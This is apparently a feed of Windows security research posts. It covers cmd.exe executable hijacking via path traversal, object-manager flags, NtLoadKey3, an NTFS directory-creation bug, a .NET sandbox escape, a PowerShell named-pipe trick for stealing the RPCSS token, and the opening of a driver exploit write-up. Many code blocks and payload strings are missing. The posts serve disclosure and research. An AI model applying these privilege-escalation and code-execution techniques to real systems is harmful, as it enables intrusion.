Now, the user can trick cmd.exe into running calc.exe instead of ping.exe by providing an argument like, traversing the path to the executable of their choice, which cmd.exe will run instead of the ping.exe binary.

So the full command line becomes:

cmd.exe /c "ping"

The potential impact of this includes Denial of Service, Information Disclosure, Arbitrary Code Execution (depending on the target application and system).

Although I am fairly sure there are some other scenarios with OS command execution whereas a part of the command line comes from a different security context than the final command is executed with (Some services maybe? I haven't search myself yet) - anyway let's use a web application as an example.

Consider the following sample PHP code:

Due to the use of escapeshellcmd() it is not vulnerable to known command injection vectors (except for argument injection, but that's a slightly different story and does not allow RCE with the list of arguments ping.exe supports - no built-in execution arguments like find's -exec).

And I know, I know, some of you will point out that in this case escapeshellarg() should be used instead - and yup, you would be right, especially since putting the argument in quotes in fact prevents this behavior, as in such case cmd.exe properly identifies the command to run (ping.exe). The trick does not work when the argument is enclosed in single/double quotes.

Anyway - the use of escapeshellcmd() instead of escapeshellarg() is very common. Noticed that while - after finding and registering CVE-2020-12669, CVE-2020-12742 and CVE-2020-12743 ended up spending one more week running automated source code analysis scans against more open source projects and manually following up the results - using my old evil SCA tool for PHP. Also that's what made me fed up with PHP again quite quickly, forcing me to get back to cmd.exe only to let me finally discover what this blog post is mostly about.

I am fairly sure there are applications vulnerable to this (doing OS command injection sanity checks, but failing to prevent path traversal and enclose the argument in quotes).

Also, the notion of similar behavior in other command interpreters is also worth entertaining.

An extended POC

Normal use:


Now, this is what normal use looks like in Sysmon log (process creation event):

So basically the child process (ping.exe) is created with command line equal to the value enclosed between the double quotes preceded by the /c switch from the parent process (cmd.exe) command line.

Now, the same for the above ipconfig.exe hijack:

And it turns out we are not limited to executables located in directories present in  %PATH%. We can traverse to any location on the same disk.

Also, we are not limited to the EXE extension, neither to the list of "executable" extensions contained in the %PATHEXT% variable (which by default is .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC - basically these are the extensions cmd.exe will try to add to the name of the command if no extension is provided, e.g. when ping is used instead of explicit ping.exe). cmd.exe runs stuff regardless to the extension, something I noticed long ago (

And one more thing - more additional arguments between the original command and the smuggled executable path can be added.

Let's see all of this combined.

For the demonstrative purposes, the following C program was compiled and linked into a PE executable (it simply prints out its own command line):

Copied the EXE into C:\xampp\tmp\cmd.png (consider this as an example of ANY location a malicious user could write a file).


So we just effectively achieved an equivalent of actual (exec, not just read) PE Local File Inclusion in an otherwise-safe PHP ping script.

But I don't think that our options end here.

The potential for extending this into a full RCE without chaining with file upload/control

I am certain it is also possible to turn this into an RCE even without the possibility of fully/partially controlling any file in the target file system and deliver the payload in the command line itself, thus creating a sort of polymorphic malicious command line payload.

When running the target executable, cmd.exe passes to it the entire part of the command line following the /c switch.

For instance:

cmd.exe /c "ping"

executes c:\windows\system32\calc.exe with command line equal ping

And, as presented in the extended POC, it is possible to hijack the executable even when providing multiple arguments, leading to command lines like:


This is the command line lol.bin would be executed with. Finding a proxy execution LOLBin tolerant enough to invalid arguments (since we as attackers cannot fully control them) could turn this into a full RCE.
The LOLBin we need is one accepting/ignoring the first argument (which is the hardcoded command we cannot control, in our example "ping"), while also willing to accept/ignore the last one (which is the traversed path to itself). Something like, but actually accepting multiple arguments while quietly ignoring the incorrect ones.

Also, I was thinking of powershell.

Running this:

cmd.exe /c "ping ;calc.exe;"

makes powershell start with command line of

ping ;calc.exe

I expected it to treat the command line as a string of inline commands and run calc.exe after running ping.exe. Yes, I know, a semicolon is used here to separate ping from calc - but the semicolon character is NOT a command separator in cmd.exe, while it is in powershell (on the other hand almost all OS Command Injection filters block it anyway, as they are written universally with multiple platforms in mind - cause obviously the semicolon IS a command separator in unix shells).

A perfect supported syntax here would be some sort of simple base64-encoded code injection like powershell's -EncodedCommand, having found a way to make it work even when preceded with a string we cannot control. Anyway, this attempt led to powershell running in interactive mode instead of treating the command line as a sequence of inline commands to execute.

Anyway, at this point turning this into an RCE boils down to researching the behaviors of particular LOLbins, focusing on the way they process their command line, rather than researching cmd.exe itself (although yes, I also thought about self-chaining and abusing cmd.exe as the LOLbin for this, in hope for taking advantage of some nuances between the way it parses its command line when it does and when it does not start with the /c switch).

Stumbling upon and some analysis

I know this looks silly enough to suggest I found it while ramming that sample PHP code over HTTP with Burp while watching Procmon with proper filters... or something like that (which isn't such a bad idea by the way)... as opposed to writing a custom cmd.exe fuzzer (no, you don't need to tell me my code is far away from elegant, I did not expect anyone would read it neither that I would reuse it), then after obtaining rather boring and disappointing results, spending weeks on static analysis with Ghidra (thanks NSA, I am literally in love with this tool), followed up with more weeks of further work with Ghidra while simultaneously manually debugging with x64dbg while further expanding comments in the Ghidra project 😂

cmd.exe command line processing starts in the CheckSwitches function (which gets called from Init, which itself gets called from main). CheckSwitches is responsible for determining what switches (like /c, /k, /v:on etc.) cmd.exe was called with. The full list of options can be found in cmd.exe /? help (which by the way, to my surprise, reflects the actual functionality pretty well).  

I spent a good deal of time analyzing it carefully, looking for hidden switches, logic issues allowing to smuggle multiple switches via the command line by jumping out of the double quotes, quote-stripping issues and whatever else would just manifest to me as I dug in.

The beginning of the CheckSwitches function after some naming editions and notes I took

If the /c switch is detected, processing moves to the actual command line enclosed in double quotes - which is the most common mode cmd.exe is used and the only one the rest of this write-up is about:

The same mode can be attained with the /r switch:

After some further logic, doing, among other things, parsing the quoted string and making some sanity fixes (like removing any spaces if any found from its beginning), a function with a very encouraging and self-explanatory name is called:

Disassembly view:

Decompiler view:

At this point it was clear it was high time for debugging to come into play.

By default x64dbg will set up a breakpoint at the entry point - mainCRTStartup.

This is a good opportunity to set an arbitrary command line:

Then start cmd.exe once again (Debug-> Restart).

We also set up a breakpoint on the top of the SearchForExecutable function, so we catch all its instances.

We run into the first instance of SearchForExecutable:

We can see that the double-quoted proper command line (after cmd.exe skips the preceding cmd.exe /c) along with its double quotes is held in RBX and R15. Also, the value on the top of the stack (right bottom corner) contains an address pointing at CheckSwitches - it's the saved RET. So we know this instance is called from CheckSwitches.

If we hit F9 again, we will run into the second instance of SearchForExecutable, but this time the command line string is held in RAX, RDI and R11, while the call originates from another function named ECWork:

This second instance resolves and returns the full path to ping.exe.

Below we can see the body of the ECWork function, with a call to SearchForExecutable (marked black). This is where the RIP was at when the screenshot was taken - right before the second call of SearchForExecutable:

Now, on below screenshot the SearchForExecutable call already returned (note the full path to ping.exe pointed at with the address held in R14). Fifteen instructions later the ExecPgm function is called, using the newly resolved executable path to create the new process:

So - seeing SearchForExecutable being called against the whole ping string (uh yeah, those evil spaces) suggests potential confusion between the full command line and an actual file name... So this gave me the initial idea to check whether the executable could be hijacked by literally creating one under a name equal to the command line that would make it run:

Uh really? Interesting. I decided to have a look with Procmon in order to see what file names cmd.exe attempts to open with CreateFile:

So yes, the result confirmed opening a copy of calc.exe from the file literally named ping .PNG in the current working directory:

Now, interestingly, I would not see any results with this Procmon filter  (Operation = CreateFile) if I did not create the file first...

One would expect to see cmd.exe mindlessly calling CreateFile against nonexistent files with names being various mutations of the command line, with NAME NOT FOUND result - the usual way one would search for potential DLL side loading issues... But NOT in this case - cmd.exe actually checks whether such file exists before calling CreateFile, by calling QueryDirectory instead:

For this purpose, in Procmon, it is more accurate to specify a filter based on the payload's unique magic string (like PNG in this case, as this would be the string we as attackers could potentially control) occurring in the Path property instead of filtering based on the Operation.

"So, anyway, this isn't very useful" - I thought and got back to x64dbg.

"We can only hijack the command if we can literally write a file under a very dodgy name into the target application's current directory... " - I kept thinking - "... Current directory... u sure ONLY current directory?" - and at this point my path traversal reflex lit up, a seemingly crazy and desperate idea to attempt traversal payloads against parts of the command line parsed by SearchForExecutable.

Which made me manually change the command line to ping and restart debugging... while already thinking of modifying the cmd.exe fuzzer in order to throw a set payloads generated for this purpose with psychoPATH against cmd.exe... But that never happened because of what I saw after I hit F9 one more time.

Below we can see x64dbg with cmd.exe ran with cmd.exe /c "ping" command line (see RDI).  We are hanging right after the second SearchForExecutable call, the one originating from the bottom of the ECWork function. Just few instructions before calling ExecPgm, which is about to execute the PE pointed by R14. The full path to C:\Windows\System32\calc.exe present R14 is the result of the just-returned  SearchForExecutable("ping") call preceding the current RIP:

The traversal appears to be relative to a subdirectory of the current working directory (calc.exe is at c:\windows\system32\calc.exe):

"Or maybe this is just a result of a failed path traversal sanity check, only removing the first occurrence of ../?" - I kept wondering.

So I dug further into the SearchForExecutable function,  also trying to find the answer why variants of the argument created by splitting it by spaces are considered and why the most-to-the-right one is chosen first when found.

I narrowed down the culprit code to the instructions within the SearchForExecutable function, between the call of mystrcspn at 14000ff64 and then the call of the FullPath function at 14001005b and exists_ex at 140010414:

In the meantime I received the following feedback from Microsoft:

We do have a blog post that helps describe the behavior you have documented:

Cmd.exe first tries to interpret the whole string as a path: "ping” string is being treated as a relative path, so “ping” is interpreted as a segment in that path, and is removed due to the preceding “../” this should help explain why you shouldn’t be able to use the user controlled input string to pass arguments to the executable.

There are a lot a cases that would require that behaviour, e.g. cmd.exe /c "....\Program Files (x86)\Internet Explorer\iexplore.exe" we wouldn’t want that to try to run some program “....\Program” with the argument “Files (x86)\Internet Explorer\iexplore.exe”.

It’s only if the full string can’t be resolved to a valid path, that it splits on spaces and takes everything before the first space as the intended executable name (hence why “ping” does work).

So yeah... those evil spaces and quoting.

From this point, I only escalated the issue by confirming the possibility of traversing to arbitrary directories as well as the ability to force execution of PE files with arbitrary extensions.

Interestingly, this slightly resembles the common unquoted service path issue, except that in this case the most-to-the-right variant gets prioritized.

The disclosure

Upon discovery I documented and reported this peculiarity to MSRC. After little less than six days the report was picked up and reviewed. About a week later Microsoft completed their assessment, concluding that this does not meet the bar for security servicing:

On one hand, I was little disappointed that Microsoft would not address it and I was not getting the CVE in cmd.exe I have wanted for some time.

On the other hand, at least nothing's holding me back from sharing it already and hopefully it will be around for some time so we can play with it 😃 It's not a vulnerability, it's a technique 😃

I would like thank Microsoft for making all of this possible - and for being nice enough to even offer me a review of this post! Which was completely unexpected, but obviously highly appreciated.

Some reflections

Researching stuff can sometimes appear to be a lonely and thankless journey, especially after days and weeks of seemingly fruitless drudging and sculpturing - but I realized this is just a short-sighted perception, whereas success is exclusively measured by the number of uncovered vulnerabilities/features/interesting behaviors (no point to argue about the terminology here 😃). In offensive security we rarely pay attention to the stuff we tried and failed, even though those failed attempts are equally important - as if we did not try, we would never know what's there (and risk false negatives). Curiosity and the need to know. And software is full of surprises.

Plus, simply dealing with a particular subject (like analyzing a given program/protocol/format) and gradually getting more and more familiar with it feeds our minds with new mental models, which makes us automatically come up with more and more ideas for potential bugs, scenarios and weird behaviors as we keep hacking. A journey through code accompanied by new inspirations, awarded with new knowledge and the peace of mind resulting from answering questions... sometimes ending with great satisfaction from a unique discovery.

OBJ_DONT_REPARSE is (mostly) Useless.

By: tiraniddo
23 May 2020 at 10:21
Continuing a theme from the last blog post, I think it's great that the two additional OBJECT_ATTRIBUTE flags were documented as a way of mitigating symbolic link attacks. While OBJ_IGNORE_IMPERSONATED_DEVICEMAP is pretty useful, the other flag, OBJ_DONT_REPARSE isn't, at least not for protecting file system access.

To quote the documentation, OBJ_DONT_REPARSE does the following:

"If this flag is set, no reparse points will be followed when parsing the name of the associated object. If any reparses are encountered the attempt will fail and return an STATUS_REPARSE_POINT_ENCOUNTERED result. This can be used to determine if there are any reparse points in the object's path, in security scenarios."

This seems pretty categorical, if any reparse point is encountered then the name parsing stops and STATUS_REPARSE_POINT_ENCOUNTERED is returned. Let's try it out in PS and open the notepad executable file.

PS> Get-NtFile \??\c:\windows\notepad.exe -ObjectAttributes DontReparse
Get-NtFile : (0xC000050B) - The object manager encountered a reparse point while retrieving an object.

Well that's not what you might expect, there should be no reparse points to access notepad, so what went wrong? We'll you're assuming that the documentation meant NTFS reparse points, when it really meant all reparse points. The C: drive symbolic link is still a reparse point, just for the Object Manager. Therefore just accessing a drive path using this Object Attribute flag fails. Still this does means that it will also work to protect you from Registry Symbolic Links as well as that also uses a Reparse Point.

I'm assuming this flag wasn't introduced for file access at all, but instead for named kernel objects where encountering a Symbolic Link is usually less of a problem. Unlike OBJ_IGNORE_IMPERSONATED_DEVICEMAP I can't pinpoint a specific vulnerability this flag was associated with, so I can't say for certain why it was introduced. Still, it's slightly annoying especially considering there is an IO Manager specific flag, IO_STOP_ON_SYMLINK which does what you'd want to avoid file system symbolic links but that can only be accessed in kernel mode with IoCreateFileEx.

Not that this flag completely protects against Object Manager redirection attacks. It doesn't prevent abuse of shadow directories for example which can be used to redirect path lookups.

PS> $d = Get-NtDirectory \Device
PS> $x = New-NtDirectory \BaseNamedObjects\ABC -ShadowDirectory $d
PS> $f = Get-NtFile \BaseNamedObjects\ABC\HarddiskVolume3\windows\notepad.exe -ObjectAttributes DontReparse
PS> $f.FullPath

Oh well...

Silent Exploit Mitigations for the 1%

By: tiraniddo
22 May 2020 at 23:59
With the accelerated release schedule of Windows 10 it's common for new features to be regularly introduced. This is especially true of features to mitigate some poorly designed APIs or easily misused behavior. The problems with many of these mitigations is they're regularly undocumented or at least not exposed through the common Win32 APIs. This means that while Microsoft can be happy and prevent their own code from being vulnerable they leave third party developers to get fucked.

One example of these silent mitigations are the additional OBJECT_ATTRIBUTE flags OBJ_IGNORE_IMPERSONATED_DEVICEMAP and OBJ_DONT_REPARSE which were finally documented, in part because I said it'd be nice if they did so. Of course, it only took 5 years to document them since they were introduced to fix bugs I reported. I guess that's pretty speedy in Microsoft's world. And of course they only help you if you're using the system call APIs which, let's not forget, are only partially documented.

While digging around in Windows 10 2004 (ugh... really, it's just confusing), and probably reminded by Alex Ionescu at some point, I noticed Microsoft have introduced another mitigation which is only available using an undocumented system call and not via any exposed Win32 API. So I thought, I should document it.

UPDATE (2020-04-23): According to @FireF0X this was backported to all supported OS's. So it's a security fix important enough to backport but not tell anyone about. Fantastic.

The system call in question is NtLoadKey3. According to j00ru's system call table this was introduced in Windows 10 2004, however it's at least in Windows 10 1909 as well. As the name suggests (if you're me at least) this loads a Registry Key Hive to an attachment point. This functionality has been extended over time, originally there was only NtLoadKey, then NtLoadKey2 was introduced in XP I believe to add some flags. Then NtLoadKeyEx was introduced to add things like explicit Trusted Hive support to mitigate cross hive symbolic link attacks (which is all j00ru's and Gynvael fault). And now finally NtLoadKey3. I've no idea why it went to 2 then to Ex then back to 3 maybe it's some new Microsoft counting system. The NtLoadKeyEx is partially exposed through the Win32 APIs RegLoadKey and RegLoadAppKey APIs, although they're only expose a subset of the system call's functionality.

Okay, so what bug class is NtLoadKey3 trying to mitigate? One of the problematic behaviors of loading a full Registry Hive (rather that a Per-User Application Hive) is you need to have SeRestorePrivilege* on the caller's Effective Token. SeRestorePrivilege is only granted to Administrators, so in order to call the API successfully you can't be impersonating a low-privileged user. However, the API can also create files when loading the hive file. This includes the hive file itself as well as the recovery log files.

* Don't pay attention to the documentation for RegLoadKey which claims you also need SeBackupPrivilege. Maybe it was required at some point, but it isn't any more.

When loading a system hive such as HKLM\SOFTWARE this isn't an issue as these hives are stored in an Administrator only location (c:\windows\system32\config if you're curious) but sometimes the hives are loaded from user-accessible locations such as from the user's profile or for Desktop Bridge support. In a user accessible location you can use symbolic link tricks to force the logs file to be written to arbitrary locations, and to make matters worse the Security Descriptor of the primary hive file is copied to the log file so it'll be accessible afterwards. An example of just this bug, in this case in Desktop Bridge, is issue 1492 (and 1554 as they didn't fix it properly (╯°□°)╯︵ ┻━┻).

RegLoadKey3 fixes this by introducing an additional parameter to specify an Access Token which will be impersonated when creating any files. This way the check for SeRestorePrivilege can use the caller's Access Token, but any "dangerous" operation will use the user's Token. Of course they could have probably implemented this by adding a new flag which will check the caller's Primary Token for the privilege like they do for SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege but what do I know...

Used appropriately this should completely mitigate the poor design of the system call. For example the User Profile service now uses NtLoadKey3 when loading the hives from the user's profile. How do you call it yourself? I couldn't find any documentation obviously, and even in the usual locations such as OLE32's private symbols there doesn't seem to be any structure data, so I made best guess with the following:

Notice that the TrustKey and Event handles from NtLoadKeyEx have also been folded up into a list of handle values. Perhaps someone wasn't sure if they ever needed to extend the system call whether to go for NtLoadKey4 or NtLoadKeyExEx so they avoided the decision by making the system call more flexible. Also the final parameter, which is also present in NtLoadKeyEx is seemingly unused, or I'm just incapable of tracking down when it gets referenced. Process Hacker's header files claim it's for an IO_STATUS_BLOCK pointer, but I've seen no evidence that's the case.

It'd be really awesome if in this new, sharing and caring Microsoft that they, well shared and cared more often, especially for features important to securing third party applications. TBH I think they're more focused on bringing Wayland to WSL2 or shoving a new API set down developers' throats than documenting things like this.

Writing Windows File System Drivers is Hard.

By: tiraniddo
20 May 2020 at 21:29
A tweet by @jonasLyk reminded me of a bug I found in NTFS a few months back, which I've verified still exists in Windows 10 2004. As far as I can tell it's not directly usable to circumvent security but it feels like a bug which could be used in a chain. NTFS is a good demonstration of how complex writing a FS driver is on Windows, so it's hardly surprising that so many weird edges cases pop up over time.

The issue in this case was related to the default Security Descriptor (SD) assignment when creating a new Directory. If you understand anything about Windows SDs you'll know it's possible to specify the inheritance rules through either the CONTAINER_INHERIT_ACE and/or OBJECT_INHERIT_ACE ACE flags. These flags represent whether the ACE should be inherited from a parent directory if the new entry is either a Directory or a File. Let's look at the code which NTFS uses to assign security to a new file and see if you can spot the bug?

The code uses SeAssignSecurityEx to create the new SD based on the Parent SD and any explicit SD from the caller. For inheritance to work you can't specify an explicit SD, so we can ignore that. Whether SeAssignSecurityEx applies the inheritance rules for a Directory or a File depends on the value of the IsDirectoryObject parameter. This is set to TRUE if the FILE_DIRECTORY_FILE options flag was passed to NtCreateFile. That seems fine, you can't create a Directory if you don't specify the FILE_DIRECTORY_FILE flag, if you don't specify a flag then a File will be created by default.

But wait, that's not true at all. If you specify a name of the form ABC::$INDEX_ALLOCATION then NTFS will create a Directory no matter what flags you specify. Therefore the bug is, if you create a directory using the $INDEX_ALLOCATION trick then the new SD will inherit as if it was a File rather than a Directory. We can verifying this behavior on the command prompt.

C:\> mkdir ABC
C:\> icacls ABC /grant "INTERACTIVE":(CI)(IO)(F)
C:\> icacls ABC /grant "NETWORK":(OI)(IO)(F)

First we create a directory ABC and grant two ACEs, one for the INTERACTIVE group will inherit on a Directory, the other for NETWORK will inherit on a File.

C:\> echo "Hello" > ABC\XYZ::$INDEX_ALLOCATION
Incorrect function.

We then create the sub-directory XYZ using the $INDEX_ALLOCATION trick. We can be sure it worked as CMD prints "Incorrect function" when it tries to write "Hello" to the directory object.

C:\> icacls ABC\XYZ

Dumping the SD for the XYZ sub-directory we see the ACEs were inherited based on it being a File, rather than a Directory as we can see an ACE for NETWORK rather than for INTERACTIVE. Finally we list ABC to verify it really is a directory.

C:\> dir ABC
 Volume in drive C has no label.
 Volume Serial Number is 9A7B-865C

 Directory of C:\ABC

2020-05-20  19:09    <DIR>          .
2020-05-20  19:09    <DIR>          ..
2020-05-20  19:05    <DIR>          XYZ

Is this useful? Honestly probably not. The only scenario I could imagine it would be is if you can specify a path to a system service which creates a file in a location where inherited File access would grant access and inherited Directory access would not. This would allow you to create a Directory you can control, but it seems a bit of a stretch to be honest. If anyone can think of a good use for this let me or Microsoft know :-)

Still, it's interesting that this is another case where $INDEX_ALLOCATION isn't correctly verified where determining whether an object is a Directory or a File. Another good example was CVE-2018-1036, where you could create a new Directory with only FILE_ADD_FILE permission. Quite why this design decision was made to automatically create a Directory when using the stream type is unclear. I guess we might never know.

Old .NET Vulnerability #5: Security Transparent Compiled Expressions (CVE-2013-0073)

By: tiraniddo
7 May 2020 at 23:12
It's been a long time since I wrote a blog post about my old .NET vulnerabilities. I was playing around with some .NET code and found an issue when serializing delegates inside a CAS sandbox, I got a SerializationException thrown with the following text:

Cannot serialize delegates over unmanaged function pointers, 
dynamic methods or methods outside the delegate creator's assembly.
I couldn't remember if this has always been there or if it was new. I reached out on Twitter to my trusted friend on these matters, @blowdart, who quickly fobbed me off to Levi. But the take away is at some point the behavior of Delegate serialization was changed as part of a more general change to add Secure Delegates.

It was then I realized, that it's almost certainly (mostly) my fault that the .NET Framework has this feature and I dug out one of the bugs which caused it to be the way it is. Let's have a quick overview of what the Secure Delegate is trying to prevent and then look at the original bug.

.NET Code Access Security (CAS) as I've mentioned before when discussing my .NET PAC vulnerability allows a .NET "sandbox" to restrict untrusted code to a specific set of permissions. When a permission demand is requested the CLR will walk the calling stack and check the Assembly Grant Set for every Stack Frame. If there is any code on the Stack which doesn't have the required Permission Grants then the Stack Walk stops and a SecurityException is generated which blocks the function from continuing. I've shown this in the following diagram, some untrusted code tries to open a file but is blocked by a Demand for FileIOPermission as the Stack Walk sees the untrusted Code and stops.

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Caller stack frame.

What has this to do with delegates? A problem occurs if an attacker can find some code which will invoke a delegate under asserted permissions. For example, in the previous diagram there was an Assert at the bottom of the stack, but the Stack Walk fails early when it hits the Untrusted Caller Frame.

However, as long as we have a delegate call, and the function the delegate calls is Trusted then we can put it into the chain and successfully get the privileged operation to happen.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a delegate.

The problem with this technique is finding a trusted function we can wrap in a delegate which you can attach to something such a Windows Forms event handler, which might have the prototype:
void Callback(object obj, EventArgs e)

and would call the File.OpenRead function which has the prototype:

FileStream OpenRead(string path).

That's a pretty tricky thing to find. If you know C# you'll know about Lambda functions, could we use something like?

EventHandler f = (o,e) => File.OpenRead(@"C:\SomePath")

Unfortunately not, the C# compiler takes the lambda, generates an automatic class with that function prototype in your own assembly. Therefore the call to adapt the arguments will go through an Untrusted function and it'll fail the Stack Walk. It looks something like the following in CIL:

Turns out there's another way. See if you can spot the difference here.

Expression lambda = (o,e) => File.OpenRead(@"C:\SomePath")
EventHandle f = lambda.Compile()

We're still using a lambda, surely nothing has changed? We'll let's look at the CIL.

That's just crazy. What's happened? The key is the use of Expression. When the C# compiler sees that type it decides rather than create a delegate in your assembly it'll creation something called an expression tree. That tree is then compiled into the final delegate. The important thing for the vulnerability I reported is this delegate was trusted as it was built using the AssemblyBuilder functionality which takes the Permission Grant Set from the calling Assembly. As the calling Assembly is the Framework code it got full trust. It wasn't trusted to Assert permissions (a Security Transparent function), but it also wouldn't block the Stack Walk either. This allows us to implement any arbitrary Delegate adapter to convert one Delegate call-site into calling any other API as long as you can do that under an Asserted permission set.

View of a stack walk in .NET allowed due to replacing untrusted call frame with a expression generated delegate.

I was able to find a number of places in WinForms which invoked Event Handlers while asserting permissions that I could exploit. The initial fix was to fix those call-sites, but the real fix came later, the aforementioned Secure Delegates.

Silverlight always had Secure delegates, it would capture the current CAS Permission set on the stack when creating them and add a trampoline if needed to the delegate to insert an Untrusted Stack Frame into the call. Seems this was later added to .NET. The reason that Serializing is blocked is because when the Delegate gets serialized this trampoline gets lost and so there's a risk of it being used to exploit something to escape the sandbox. Of course CAS is dead anyway.

The end result looks like the following:

View of a stack walk in .NET blocking a FileIOPermission Demand on an Untrusted Trampoline Stack Frame.

Anyway, these are the kinds of design decisions that were never full scoped from a security perspective. They're not unique to .NET, or Java, or anything else which runs arbitrary code in a "sandboxed" context including things JavaScript engines such as V8 or JSCore.

Sharing a Logon Session a Little Too Much

By: tiraniddo
25 April 2020 at 23:34
The Logon Session on Windows is tied to an single authenticated user with a single Token. However, for service accounts that's not really true. Once you factor in Service Hardening there could be multiple different Tokens all identifying in the same logon session with different service groups etc. This blog post demonstrates a case where this sharing of the logon session with multiple different Tokens breaks Service Hardening isolation, at least for NETWORK SERVICE. Also don't forget S-1-1-0, this is NOT A SECURITY BOUNDARY. Lah lah, I can't hear you!

Let's get straight to it, when LSASS creates a Token for a new Logon session it stores that Token for later retrieval. For the most part this isn't that useful, however there is one case where the session Token is repurposed, network authentication. If you look at the prototype of AcquireCredentialsHandle where you specify the user to use for network authentication you'll notice a pvLogonID parameter. The explanatory note says:

"A pointer to a locally unique identifier (LUID) that identifies the user. This parameter is provided for file-system processes such as network redirectors. This parameter can be NULL."

What does this really mean? We'll if you have TCB privilege when doing network authentication this parameter specifies the Logon Session ID (or Authentication ID if you're coming from the Token's perspective) for the Token to use for the network authentication. Of course normally this isn't that interesting if the network authentication is going to another machine as the Token can't follow ('ish). However what about Local Loopback Authentication? In this case it does matter as it means that the negotiated Token on the server, which is the same machine, will actually be the session's Token, not the caller's Token.

Of course if you have TCB you can almost do whatever you like, why is this useful? The clue is back in the explanatory note, "... such as network redirectors". What's an easily accessible network redirector which supports local loopback authentication? SMB. Is there any primitives which SMB supports which allows you to get the network authentication token? Yes, Named Pipes. Will SMB do the network authentication in kernel mode and thus have effective TCB privilege? You betcha. To the PowerShellz!

Note, this is tested on Windows 10 1909, results might vary. First you'll need a PowerShell process running at NETWORK SERVICE. You can follow the instructions from my previous blog post on how to do that. Now with that shell we're running a vanilla NETWORK SERVICE process, nothing special. We do have SeImpersonatePrivilege though so we could probably run something like Rotten Potato, but we won't. Instead why not target the RPCSS service process, it also runs as NETWORK SERVICE and usually has loads of juicy Token handles we could steal to get to SYSTEM. There's of course a problem doing that, let's try and open the RPCSS service process.

PS> Get-RunningService "rpcss"
Name  Status  ProcessId
----  ------  ---------
rpcss Running 1152

PS> $p = Get-NtProcess -ProcessId 1152
Get-NtProcess : (0xC0000022) - {Access Denied}
A process has requested access to an object, but has not been granted those access rights.

Well, that puts an end to that. But wait, what Token would we get from a loop back authentication over SMB? Let's try it. First create a named pipe and start it listening for a new connection.

PS> $pipe = New-NtNamedPipeFile \\.\pipe\ABC -Win32Path
PS> $job = Start-Job { $pipe.Listen() }

Next open a handle to the pipe via localhost, and then wait for the job to complete.

PS> $file = Get-NtFile \\localhost\pipe\ABC -Win32Path
PS> Wait-Job $job | Out-Null

Finally open the RPCSS process again while impersonating the named pipe.

PS> $p = Use-NtObject($pipe.Impersonate()) { 
>>     Get-NtProcess -ProcessId 1152 
>>  }
PS> $p.GrantedAccess

How on earth does that work? Remember I said that the Token stored by LSASS is the first token created in that Logon Session? Well the first NETWORK SERVICE process is RPCSS, so the Token which gets saved is RPCSS's one. We can prove that by opening the impersonation token and looking at the group list.

PS> $token = Use-NtObject($pipe.Impersonate()) { 
>> Get-NtToken -Impersonation 
>> }
PS> $token.Groups | ? Name -Match Rpcss
Name             Attributes
----             ----------
NT SERVICE\RpcSs EnabledByDefault, Owner

Weird behavior, no? Of course this works for every logon session, though a normal user's session isn't quite so interesting. Also don't forget that if you access the admin shares as NETWORK SERVICE you'll actually be authenticated as the RPCSS service so any files it might have dropped with the Service SID would be accessible. Anyway, I'm sure others can come up with creative abuses of this.

CVE-2020-12138 Exploit Proof-of-Concept, Privilege Escalation in ATI Technologies Inc. Driver atillk64.sys

By: h0mbre
25 April 2020 at 04:00


I’ve been focusing, really since the end of January, on working through the FuzzySecurity exploit development tutorials on the HackSysExtremeVulnerableDriver to try and learn some more about Windows kernel exploitation and have really enjoyed my time a lot.

During this time, @ihack4falafel released some proof-of-concept exploits[1][2] against several Windows kernel-mode drivers. The takeaway from these write-ups, for me, was that 3rd party drivers that are responsible for overclocking, RGB light-management, hardware diagnostics are largely broken.

The types of vulnerabilities that were disclosed in these write-ups often were related to low-privileged users having the ability to interact with a kernel-mode driver that was able to directly manipulate physical memory, where all kinds of privileged information resides.

The last FuzzySecurity Windows Exploit Development Tutorial Series is b33f’s exploit against a Razer driver exploiting this very same type of vulnerability.

Getting more interested in this type of bug, I sought out more write-ups and found some great proof-of-concepts:

  • Jackson T’s write-up of an LG driver privilege escalation vulnerability,
  • hatRiot’s write-up of a Dell driver privilege escalation vulnerability, and
  • ReWolf’s write-up of a few different driver vulnerabilities within the same type of logic bug realm.

After reading through those, I decided to just start downloading similar software and searching for drivers that I hadn’t seen CVEs for and that had some key APIs. My criteria when searching was that the driver had to:

  • allow low-privileged users to interact with it,
  • have either an MmMapIoSpace or ZwMapViewOfSection import.

As someone who is very new to this type of thing, I figured with the help of the aforementioned walkthroughs, if I was able to find a driver that would allow me to interact with physical memory I could successfully develop an exploit.


This is kind of a niche space and as a new person getting into this very specific type of target I wasn’t really aware of the best places to look for more information about these types of vulnerable drivers. The first few things I checked was that there were no CVEs for the driver and that the driver hadn’t been mentioned on Twitter by security researchers. By the time I had reversed the driver and discovered it to be vulnerable in theory, but without a working exploit, I realized that the driver had been classified as vulnerable by researchers Jesse Michael and Mickey Shkatov at Eclypsium. The driver gets a small mention in their github repo but without specifically identifying the vulnerabilities that exist.

I’m not claiming responsibility for finding the vulnerability, since I was far from the first. Jesse and Mickey were given all of the credit on the CVE application and I can prove this upon request.

I was able to get in contact with Jesse via Twitter and he was extremely charitable with his time. He gave me a great explanation of their interactions with a vendor about the driver.

At this point, since there was no published proof-of-concept, I decided to press on and develop the exploit, which Jesse wholeheartedly supported and encouraged. I figured I’d develop an exploit, show AMD the proof-of-concept, and give them 90 days to respond/patch or explain that they’re not concerned.

Huge thanks to Jesse for being so charitable. He’s also incredibly knowledgeable and was willing to teach me tons of things along the way when answering my questions.

GIGABYTE Fusion 2.0

One of the first software packages I downloaded was GIGABYTE’s Fusion 2.0 software which comes with several drivers. I won’t get any more in-depth with the types of drivers included other than the subject of this post, atillk64.sys. Using default installation options, the driver was installed here: C:\Program Files (x86)\GIGABYTE\RGBFusion\AtiTool\atillk64.sys.

The driver file description states the product name is ATI Diagnostics version and its copyright is ATI Technologies Inc. 2003. I’m not sure what other software packages out there also install this driver, but I’m sure Fusion 2.0 isn’t the only one. I’ve found that several of these hardware diagnostic/configuration software suites install licensed drivers that are often slightly modified (or not modified at all!) versions of known-to-be vulnerable code-bases like the classic WinIO.sys.

atillk64.sys Analysis

The first thing I needed to know was what types of permissions the driver had and if lower-privileged users could interact with the driver. Looking at the device with OSR’s devicetree, we can see that this is the case.

